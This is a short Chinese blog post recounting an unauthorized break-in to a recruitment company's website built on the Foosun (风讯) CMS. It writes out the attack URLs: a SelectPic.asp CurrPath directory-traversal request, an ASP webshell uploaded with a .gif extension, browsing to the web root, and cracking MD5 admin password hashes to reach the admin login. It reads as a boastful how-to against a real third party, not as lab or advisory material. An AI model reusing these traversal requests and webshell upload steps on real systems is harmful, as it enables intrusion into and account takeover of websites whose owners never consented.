入侵检测西安招聘网站 
 

翻开几个看看，有个公司要求还挺高的，习惯性的先看看这个公司的网站，于是有了下文。
打开它的网站，首先看了一下是什么程序写的，发现很多html，还有些asp的，没报多大希望。看到有注册用户，于是我也注册了，当鼠标移动到注册按钮上面时，我发现浏览器左下角显示的路径和文件名都很眼熟，是什么呢？啊~~对了，是风讯。
注册过程中发现和以前看到的注册页面不大一样，于是想：系统这么多，同路径同文件名的大有所在。到了注册完毕，终于看到曙光了。果然就是风讯的，赶紧找上传相片那个地方，然后用：
User/CommPages/SelectPic.asp?CurrPath=/UserFiles/注册获得的ID&f_UserNumber=注册获得的ID
打开看看，接着用：
User/CommPages/SelectPic.asp?CurrPath=/UserFiles/020655AC021/test.aspf_UserNumber=020655AC021
访问，选择了个asp马（后缀当然是gif了），上传成功！打开图片地址访问出错了：
User/CommPages/SelectPic.asp?CurrPath=/UserFiles/test.asp&f_UserNumber=020655AC021
结果：
继续浏览一下整个网站看看有什么东西。
User/CommPages/SelectPic.asp?CurrPath=../../f_UserNumber=020655AC021
到网站根目录了：
找到管理帐号和密码（当然是从MD5破解得来的），然后又用那个漏洞找到了管理登陆处。进入。。。。
本文来源于：尼克技术博客 http://www.ineeke.cn/ ;, 原文地址：http://www.ineeke.cn/archives/ruqinjiancewangzhan/ ;